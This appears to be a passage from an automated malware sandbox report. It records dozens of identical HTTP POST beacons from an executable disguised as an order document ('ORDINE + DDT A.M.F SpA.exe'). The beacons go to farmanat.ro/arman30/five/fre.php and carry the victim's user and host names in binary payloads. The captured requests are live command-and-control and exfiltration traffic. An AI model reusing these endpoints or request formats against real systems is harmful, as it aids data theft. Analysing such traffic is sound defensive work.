                                              Nov 25, 2021 10:52:05.722067118 CET6963OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:05.790992975 CET6963INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              464192.168.11.2050308176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:06.226742983 CET6964OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:06.260984898 CET6964OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:06.311167002 CET6964INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              465192.168.11.2050309176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:06.742991924 CET6965OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:06.776707888 CET6965OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:06.825978041 CET6966INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              466192.168.11.2050310176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:07.216253042 CET6966OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:07.250541925 CET6967OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:07.303674936 CET6967INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              467192.168.11.2050311176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:07.736749887 CET6968OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:07.770236015 CET6968OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:07.820126057 CET6968INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              468192.168.11.2050312176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:08.228883982 CET6969OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:08.262440920 CET6969OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:08.315520048 CET6970INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              469192.168.11.2050313176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:08.719767094 CET6970OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:08.754209042 CET6971OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:08.804300070 CET6971INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              47192.168.11.2049883176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:31.831959963 CET6375OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:31.865540028 CET6375OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:31.919064045 CET6376INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              470192.168.11.2050314176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:09.223408937 CET6972OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:09.257425070 CET6972OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:09.313186884 CET6972INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              471192.168.11.2050315176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:09.728245974 CET6973OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:09.762285948 CET6973OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:09.812256098 CET6974INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              472192.168.11.2050316176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:10.154548883 CET6974OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:10.188919067 CET6975OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:10.241029024 CET6975INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              473192.168.11.2050317176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:10.673270941 CET6976OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:10.706855059 CET6976OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:10.756206036 CET6976INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              474192.168.11.2050318176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:11.194119930 CET6977OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:11.228583097 CET6977OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:11.296035051 CET6978INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              475192.168.11.2050319176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:11.717968941 CET6978OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:11.751519918 CET6979OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:11.803318977 CET6979INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              476192.168.11.2050320176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:12.234683037 CET6980OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:12.268924952 CET6980OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:12.319963932 CET6980INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              477192.168.11.2050321176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:12.694839001 CET6981OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:12.728185892 CET6981OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:12.788178921 CET6982INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              478192.168.11.2050322176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:13.182188034 CET6982OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:13.216311932 CET6983OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:13.267443895 CET6983INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              479192.168.11.2050323176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:13.677236080 CET6984OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:13.710833073 CET6984OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:13.760864019 CET6984INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              48192.168.11.2049884176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:32.435657024 CET6376OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:32.469261885 CET6377OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:32.519407034 CET6377INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              480192.168.11.2050324176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
